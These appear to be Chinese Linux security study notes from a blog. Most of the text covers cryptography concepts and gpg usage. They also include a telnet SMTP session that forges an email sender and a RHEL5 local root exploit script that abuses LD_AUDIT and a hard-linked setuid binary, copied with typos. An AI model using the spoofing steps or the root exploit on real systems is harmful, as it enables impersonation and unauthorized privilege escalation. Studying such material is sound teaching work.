安全基礎
仿冒別人給某人發郵件
telnet 127.0.0.1 25
helo a.com 命令
mail from:god@heaven.com 從某處發來的郵件
rcpt to:root 給某人發郵件
data 數據
subject:hello 郵件名
I miss you 郵件正文
How old are you
. 點代表結束
quit
redhat5普通用戶提升管理員權限腳本
mkdir /tmp/wang
ln /bin/ping /tmp/wang/test
exec 3< /tmp/wang/test
rm -rf /tmp/wang
cat > /tmp/wang.c <<eof
void _attribute_((constrector)) init()
{
setuid(0);
system(“/bin/bash”);
}
eof
gcc -w -fPIC -shared -o /tmp/wang /tmp/wang.c
LD_AUDIT=”$ORIGIN” exec /proc/self/fd/3 &> /dev/null
兩種加密體系
加密算法
1算法可以公開
2密鑰(口令)不公開
love
orzi 每一位字母向后移三位
凱撒密碼
對稱
data明文–加密key1–data’密文–解密key2–data明文
對稱:key1==key2 加密解密都是相同密鑰
非對稱:key1 != key2 加密解密是不同密鑰
非對稱
公鑰加密對應的另一把私鑰解密 Pa,Sa
私鑰加密對應的另一把公鑰解密 Pb,Sb
數字簽名,數據來源的確認
data明文–加密key1=Sa–data’密文–解密key2=Pa–data明文
DES:1G 2G 4分鐘 8分鐘 對稱的
RSA:1G 1G 1分鐘 64hour 非對稱的
Pb[Sa(data)]
Sb{Pb[Sa(data)]}=Sa(data)
Pa{Sa(data)}=data
md5 128
sha1 160
sha512 512
hash(data)=digest 摘要(密鑰)
1 data不同,摘要必不同(密鑰)
2 摘要(密鑰)相同,data相同
3 不論data大小,digest大小只能算法有關
4 hash算法,不可逆
md5sum case.sh 得出摘要 16進制 數據不變摘要之不變 得到摘要值推算不出data不可逆
sha1sum f1.sh 160位的16進制數
兩種算法已被破解 山東大學教授王小云
sha512sum file
1 Pb[Sa(data)]
2 Pb{data+Sa[hash(data)]}
Sb{Pb{data+Sa[hash(data)]}}=data+Sa[hash(data)]
hash(data)=A
Pa{Sa[hash(data)]}=hash(data)=B
A=B?
3 對稱 非 hash
key{data+Sa[hash(data)]}+Pb(key)
密鑰交換
DH(Deffie-Hellman)
大素數(大質數)能夠被1和自己整除的數字
rpm -V bash 查看文件中元數據是否發生變化,包校驗
對稱密鑰
gpg -c file 加密
gpg -d file.gpg 解密
gpg -o file1 -d file.gpg
非對稱密鑰
gpg –gen–key 生成密鑰對
gpg –list–key
cd .gnupg/ 存放生成的密鑰的目錄
往別的用戶導公鑰
gpg -a –export -o /app/file.pubkey 生成易讀的格式導出到文件
scp … 拷貝
(7)gpg –import /app/file.pub.key 導入公鑰
gpg -e -r magedu(公鑰) file 用magedu的公鑰加密文件
scp .. 拷貝
(6)gpg -d file.gpg 解密
本文來自投稿,不代表Linux運維部落立場,如若轉載,請注明出處:http://www.www58058.com/91185